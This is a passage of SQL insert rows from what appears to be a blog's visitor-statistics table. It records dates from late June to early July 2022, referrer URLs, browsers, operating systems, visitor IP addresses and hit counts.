(22181,'2022-06-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22182,'2022-06-28','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','111.224.221.91','000',0,1,0),
(22183,'2022-06-28','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','113.206.179.64','000',0,1,0),
(22184,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.234.82','000',0,1,0),
(22185,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.25.246','000',0,1,0),
(22186,'2022-06-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','193.92.182.236','000',0,2,0),
(22187,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(22188,'2022-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.115.86','000',0,1,0),
(22189,'2022-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(22190,'2022-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22191,'2022-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22192,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.169','000',0,1,0),
(22193,'2022-06-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22194,'2022-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,2,0),
(22195,'2022-06-28','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','54.227.32.154','000',0,1,0),
(22196,'2022-06-28','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22197,'2022-06-28','http://ictbank.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','116.202.209.244','000',0,9,0),
(22198,'2022-06-29','http://ictbank.ir/blog','Safari','iOS','7.1.2',NULL,NULL,'','119.90.52.35','000',0,1,0),
(22199,'2022-06-29','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','202.18.233.147','000',0,1,0),
(22200,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,4,0),
(22201,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.55.71.106','000',0,2,0),
(22202,'2022-06-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22203,'2022-06-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22204,'2022-06-29','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','124.126.78.170','000',0,1,0),
(22205,'2022-06-29','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.222','000',0,3,0),
(22206,'2022-06-29','http://ictbank.ir/blog','Chrome','OpenBSD','',NULL,NULL,'','106.75.50.30','000',0,1,0),
(22207,'2022-06-29','http://ictbank.ir/blog','Nokia Browser','Series60','5.2',NULL,NULL,'','119.90.52.34','000',0,1,0),
(22208,'2022-06-29','http://wikisonnati.com/blog','Chrome','Linux','Unknown',NULL,NULL,'','65.21.253.99','000',0,2,0),
(22209,'2022-06-29','http://ictbank.ir/blog','Unknown','Windows','6.1',NULL,NULL,'','64.124.51.154','000',0,2,0),
(22210,'2022-06-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(22211,'2022-06-29','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22212,'2022-06-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22213,'2022-06-29','http://www.design-arena.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','106.75.103.44','000',0,1,0),
(22214,'2022-06-29','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,2,0),
(22215,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.26','000',0,3,0),
(22216,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.188.62.21','000',0,2,0),
(22217,'2022-06-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.15','000',0,2,0),
(22218,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.206.55.48','000',0,1,0),
(22219,'2022-06-29','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','196.242.178.145','000',0,10,0),
(22220,'2022-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22221,'2022-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(22222,'2022-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22223,'2022-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22224,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.248.184.84','000',0,1,0),
(22225,'2022-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.129.154','000',0,1,0),
(22226,'2022-06-29','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','27.115.124.38','000',0,1,0),
(22227,'2022-06-29','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.84','000',0,1,0),
(22228,'2022-06-29','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.93','000',0,1,0),
(22229,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22230,'2022-06-30','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','106.75.73.226','000',0,1,0),
(22231,'2022-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.39','000',0,2,0),
(22232,'2022-06-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','34.227.84.12','000',0,2,0),
(22233,'2022-06-30','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.11','000',0,2,0),
(22234,'2022-06-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22235,'2022-06-30','http://www.wikisonnati.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.75.95.101','000',0,2,0),
(22236,'2022-06-30','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,6,0),
(22237,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.72','000',0,2,0),
(22238,'2022-06-30','http://ictbank.ir/blog','Chromium','Ubuntu','11.04',NULL,NULL,'','208.80.194.126','000',0,3,0),
(22239,'2022-06-30','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','125.228.74.137','000',0,3,0),
(22240,'2022-06-30','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.64.3','000',0,1,0),
(22241,'2022-06-30','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22242,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.70','000',0,2,0),
(22243,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','151.106.35.199','000',0,2,0),
(22244,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(22245,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(22246,'2022-06-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,1,0),
(22247,'2022-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.199.85.61','000',0,2,0),
(22248,'2022-06-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','77.243.61.193','000',0,1,0),
(22249,'2022-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22250,'2022-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.222.35','000',0,1,0),
(22251,'2022-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22252,'2022-06-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(22253,'2022-06-30','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','20.115.46.213','000',0,2,0),
(22254,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(22255,'2022-06-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.134.225.36','000',0,1,0),
(22256,'2022-06-30','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','212.102.33.250','000',0,2,0),
(22257,'2022-06-30','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','212.102.33.37','000',0,2,0),
(22258,'2022-07-01','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','212.102.33.242','000',0,2,0),
(22259,'2022-07-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22260,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.144.133','000',0,2,0),
(22261,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22262,'2022-07-01','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','212.102.33.248','000',0,4,0),
(22263,'2022-07-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22264,'2022-07-01','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','181.214.218.69','000',0,2,0),
(22265,'2022-07-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.42','000',0,12,0),
(22266,'2022-07-01','http://ictbank.ir/blog/index.php/2020/02/06/add-new-disk-to-redhat-based-linux-without-reboot/?unapproved=6&moderation-hash=82ffdd327e52539aa1ee721cf2c38173#comment-6','Chrome','Windows','6.1',NULL,NULL,'','136.169.243.111','000',0,8,0),
(22267,'2022-07-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22268,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','85.15.120.26','000',0,2,0),
(22269,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.74.195.14','000',0,2,0),
(22270,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(22271,'2022-07-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22272,'2022-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.102.148.189','000',0,1,0),
(22273,'2022-07-01','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22274,'2022-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.98.101.133','000',0,1,0),
(22275,'2022-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.0.229','000',0,1,0),
(22276,'2022-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22277,'2022-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22278,'2022-07-01','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22279,'2022-07-01','http://82.102.9.14:80/','Firefox','Windows','10.0',NULL,NULL,'','96.44.143.78','000',0,2,0),
(22280,'2022-07-01','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.148','000',0,2,0),
(22281,'2022-07-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.171.152.101','000',0,2,0),
(22282,'2022-07-02','http://ictbank.ir/blog','Firefox','Ubuntu','10.04',NULL,NULL,'','208.80.194.126','000',0,8,0),
(22283,'2022-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(22284,'2022-07-02','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22285,'2022-07-02','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.66','000',0,1,0),
(22286,'2022-07-02','http://ictbank.ir/blog','Chrome','OS X','10.9.5',NULL,NULL,'','192.3.240.176','000',0,10,0),
(22287,'2022-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.32','000',0,1,0),
(22288,'2022-07-02','http://82.102.9.14:80/','Firefox','Windows','10.0',NULL,NULL,'','96.44.143.74','000',0,3,0),
(22289,'2022-07-02','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22290,'2022-07-02','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','74.208.30.51','000',0,2,0),
(22291,'2022-07-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','95.181.238.92','000',0,4,0),
(22292,'2022-07-02','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,2,0),
(22293,'2022-07-02','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','159.242.234.19','000',0,1,0),
(22294,'2022-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.183.106.3','000',0,1,0),
(22295,'2022-07-02','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.238.194.145','000',0,1,0),
(22296,'2022-07-02','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.71.169','000',0,1,0),
(22297,'2022-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22298,'2022-07-02','http://ictbank.ir/blog','Internet Explorer','Windows','6.2',NULL,NULL,'','169.197.103.202','000',0,3,0),
(22299,'2022-07-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22300,'2022-07-02','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(22301,'2022-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.34','000',0,1,0),
(22302,'2022-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22303,'2022-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22304,'2022-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(22305,'2022-07-02','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.135.165','000',0,1,0),
(22306,'2022-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.44','000',0,1,0),
(22307,'2022-07-02','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.45','000',0,8,0),
(22308,'2022-07-03','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,6,0),
(22309,'2022-07-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,2,0),
(22310,'2022-07-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22311,'2022-07-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.45','000',0,1,0),
(22312,'2022-07-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.42','000',0,1,0),
(22313,'2022-07-03','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22314,'2022-07-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(22315,'2022-07-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','213.226.123.241','000',0,1,0),
(22316,'2022-07-03','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.126.192','000',0,1,0),
(22317,'2022-07-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22318,'2022-07-03','http://ictbank.ir/blog','Chrome','Android','8.1.0',NULL,NULL,'','195.64.229.253','000',0,1,0),
(22319,'2022-07-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.114.34','000',0,1,0),
(22320,'2022-07-03','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','193.128.114.45','000',0,1,0),
(22321,'2022-07-03','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(22322,'2022-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.123.152','000',0,1,0),
(22323,'2022-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.125.219','000',0,1,0),
(22324,'2022-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22325,'2022-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22326,'2022-07-03','http://ictbank.ir/blog','Unknown','Windows','10.0',NULL,NULL,'','84.17.48.75','000',0,1,0),
(22327,'2022-07-03','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.213','000',0,1,0),
(22328,'2022-07-03','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','5.188.62.76','000',0,1,0),
(22329,'2022-07-03','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','51.254.199.11','000',0,2,0),
(22330,'2022-07-03','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22331,'2022-07-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22332,'2022-07-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','208.80.194.121','000',0,6,0),
(22333,'2022-07-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','212.102.33.247','000',0,2,0),
(22334,'2022-07-04','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','208.80.194.126','000',0,1,0),
(22335,'2022-07-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,4,0),
(22336,'2022-07-04','http://wikisonnati.ir','Chrome','Windows','10.0',NULL,NULL,'','169.197.103.202','000',0,3,0),
(22337,'2022-07-04','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.90.190.115','000',0,2,0),
(22338,'2022-07-04','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.193.207.104','000',0,1,0),
(22339,'2022-07-04','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.79.159.51','000',0,2,0),
(22340,'2022-07-04','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','118.193.45.5','000',0,1,0),
(22341,'2022-07-04','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','134.122.132.6','000',0,2,0),
(22342,'2022-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.215.139.98','000',0,1,0),
(22343,'2022-07-04','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,2,0),
(22344,'2022-07-04','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','154.89.5.38','000',0,1,0),
(22345,'2022-07-04','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.80','000',0,2,0),
(22346,'2022-07-04','http://www.ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','154.89.5.36','000',0,1,0),
(22347,'2022-07-04','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(22348,'2022-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,2,0),
(22349,'2022-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22350,'2022-07-04','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(22351,'2022-07-04','https://duckduckgo.com/','Chrome','Windows','10.0',NULL,NULL,'','82.207.250.181','000',0,1,0),
(22352,'2022-07-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','15.204.143.158','000',0,2,0),
(22353,'2022-07-04','http://ictbank.ir/blog','Android Browser','Android','9',NULL,NULL,'','39.103.190.43','000',0,2,0),
(22354,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','213.239.193.124','000',0,1,0),
(22355,'2022-07-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,4,0),
(22356,'2022-07-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,5,0),
(22357,'2022-07-05','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','208.80.194.122','000',0,5,0),
(22358,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','20.7.16.29','000',0,1,0),
(22359,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.201.9.12','000',0,1,0),
(22360,'2022-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(22361,'2022-07-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.39','000',0,1,0),
(22362,'2022-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.53','000',0,2,0),
(22363,'2022-07-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(22364,'2022-07-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.43','000',0,1,0),
(22365,'2022-07-05','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.35.128','000',0,2,0),
(22366,'2022-07-05','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,1,0),
(22367,'2022-07-05','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','208.80.194.121','000',0,1,0),
(22368,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.104.156.51','000',0,2,0),
(22369,'2022-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22370,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.90.77.99','000',0,1,0),
(22371,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.146.83','000',0,2,0),
(22372,'2022-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.214.63','000',0,1,0),
(22373,'2022-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22374,'2022-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.97.131.196','000',0,1,0),
(22375,'2022-07-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22376,'2022-07-05','http://www.design-arena.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','120.41.45.199','000',0,2,0),
(22377,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.119.81.106','000',0,2,0),
(22378,'2022-07-05','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.162','000',0,1,0),
(22379,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(22380,'2022-07-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','167.172.97.238','000',0,1,0),
(22381,'2022-07-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.101.16.182','000',0,2,0),
(22382,'2022-07-06','http://ictbank.ir/blog','Chrome','OS X','10.6.6',NULL,NULL,'','208.80.194.121','000',0,3,0),
(22383,'2022-07-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','208.80.194.126','000',0,6,0),
(22384,'2022-07-06','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','125.77.168.116','000',0,4,0),
(22385,'2022-07-06','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','96.44.143.86','000',0,2,0),
(22386,'2022-07-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','81.17.18.60','000',0,1,0),
(22387,'2022-07-06','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','159.65.173.30','000',0,2,0),
(22388,'2022-07-06','http://ictbank.ir/blog','Safari','OS X','10.7.2',NULL,NULL,'','208.80.194.122','000',0,1,0),
(22389,'2022-07-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.7.214.104','000',0,3,0),
(22390,'2022-07-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.59','000',0,10,0),
(22391,'2022-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.40.11.131','000',0,1,0),
(22392,'2022-07-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','64.124.8.31','000',0,1,0),
(22393,'2022-07-06','http://ictbank.ir/blog','Chrome','OS X','10.14.4',NULL,NULL,'','65.108.72.49','000',0,1,0),
(22394,'2022-07-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.106','000',0,4,0),
(22395,'2022-07-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(22396,'2022-07-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(22397,'2022-07-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.196.0.67','000',0,1,0),
(22398,'2022-07-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.244.3','000',0,1,0),
(22399,'2022-07-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.170.64','000',0,1,0),
(22400,'2022-07-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(22401,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.181.60.12','000',0,1,0),
(22402,'2022-07-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.66','000',0,2,0),
(22403,'2022-07-07','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','212.102.33.249','000',0,2,0),
(22404,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.119.81.106','000',0,4,0),
(22405,'2022-07-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(22406,'2022-07-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.2.35','000',0,2,0),
